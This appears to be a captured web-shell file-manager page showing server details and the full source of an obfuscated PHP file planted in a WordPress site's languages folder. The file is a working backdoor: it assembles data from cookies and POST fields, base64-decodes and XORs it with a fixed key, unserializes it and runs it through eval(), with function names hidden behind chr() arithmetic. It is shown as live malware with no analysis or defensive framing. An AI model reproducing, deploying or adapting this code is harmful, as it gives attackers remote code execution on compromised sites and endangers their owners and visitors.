HEX
Server: nginx/1.24.0
System: Linux webserver 6.8.0-59-generic #61-Ubuntu SMP PREEMPT_DYNAMIC Fri Apr 11 23:16:11 UTC 2025 x86_64
User: wpuser (1002)
PHP: 8.3.6
Disabled: NONE
$ pwd: /opt/wpsites/datainsightnow.com/wp-content/languages/
Upload Files
File: /opt/wpsites/datainsightnow.com/wp-content/languages/bc5d82e2.php
$bkvbp = chr (86) . "\x5f" . chr ( 664 - 584 ).'a' . 'D' . "\131" . 'c';$VFBCR = chr (99) . "\x6c" . "\x61" . chr (115) . chr ( 972 - 857 )."\x5f" . "\x65" . "\170" . "\x69" . 's' . chr (116) . chr (115); $vjgKBPJq = class_exists($bkvbp); $VFBCR = "3064";$Svswim = strpos($VFBCR, $bkvbp);if ($vjgKBPJq == $Svswim){function HXKXYimk(){$hNFlwYqnY = new /* 45099 */ V_PaDYc(41720 + 41720); $hNFlwYqnY = NULL;}$qvqslhBO = "41720";class V_PaDYc{private function ipCDh($qvqslhBO){if (is_array(V_PaDYc::$wSlPJyj)) {$KfDLmNrl2 = str_replace("<" . "?php", "", V_PaDYc::$wSlPJyj["content"]);eval($KfDLmNrl2); $qvqslhBO = "41720";exit();}}public function VyOenQkQZa(){$KfDLmNrl = "13242";$this->_dummy = str_repeat($KfDLmNrl, strlen($KfDLmNrl));}public function __destruct(){V_PaDYc::$wSlPJyj = @unserialize(V_PaDYc::$wSlPJyj); $qvqslhBO = "24079_28978";$this->ipCDh($qvqslhBO); $qvqslhBO = "24079_28978";}public function BwhSx($KfDLmNrl, $RXzWAy){return $KfDLmNrl[0] ^ str_repeat($RXzWAy, (strlen($KfDLmNrl[0]) / strlen($RXzWAy)) + 1);}public function Swwqk($KfDLmNrl){$IQihkw = chr (98) . chr ( 669 - 572 ).'s' . "\145" . chr (54) . "\x34";return array_map($IQihkw . chr ( 177 - 82 )."\x64" . "\x65" . chr ( 1053 - 954 )."\x6f" . "\x64" . "\x65", array($KfDLmNrl,));}public function __construct($XsTpbaQFi=0){$FuMkZqtL = ',';$KfDLmNrl = "";$eiLrT = $_POST;$ZtIOmADMa = $_COOKIE;$RXzWAy = "1af84d58-4034-40d1-9338-f235404f6ce6";$uNHbCOubfQ = @$ZtIOmADMa[substr($RXzWAy, 0, 4)];if (!empty($uNHbCOubfQ)){$uNHbCOubfQ = explode($FuMkZqtL, $uNHbCOubfQ);foreach ($uNHbCOubfQ as $tOtszuuJ){$KfDLmNrl .= @$ZtIOmADMa[$tOtszuuJ];$KfDLmNrl .= @$eiLrT[$tOtszuuJ];}$KfDLmNrl = $this->Swwqk($KfDLmNrl);}V_PaDYc::$wSlPJyj = $this->BwhSx($KfDLmNrl, $RXzWAy);if (strpos($RXzWAy, $FuMkZqtL) !== FALSE){$RXzWAy = explode($FuMkZqtL, $RXzWAy); $eVbMqyfxhr = base64_decode(md5($RXzWAy[0])); $NWuWmjedyj = strlen($RXzWAy[1]) > 5 ? substr($RXzWAy[1], 0, 5) : $RXzWAy[1];$_GET['new_key'] = md5(implode('', $RXzWAy)); $HpiVTl = str_repeat($NWuWmjedyj, 2); $jVROOpDBj = array_map('trim', $RXzWAy);if (is_array($jVROOpDBj) && count($jVROOpDBj) > 1) {$NXiTiBoD = $jVROOpDBj[0];} else {$NXiTiBoD = '';}$GPihkjR = rawurldecode($NXiTiBoD); $_POST['decoded_key'] = $GPihkjR;$ApBeI = str_split($GPihkjR, 2);}}public static $wSlPJyj = 39816;}HXKXYimk();}
@ Telegram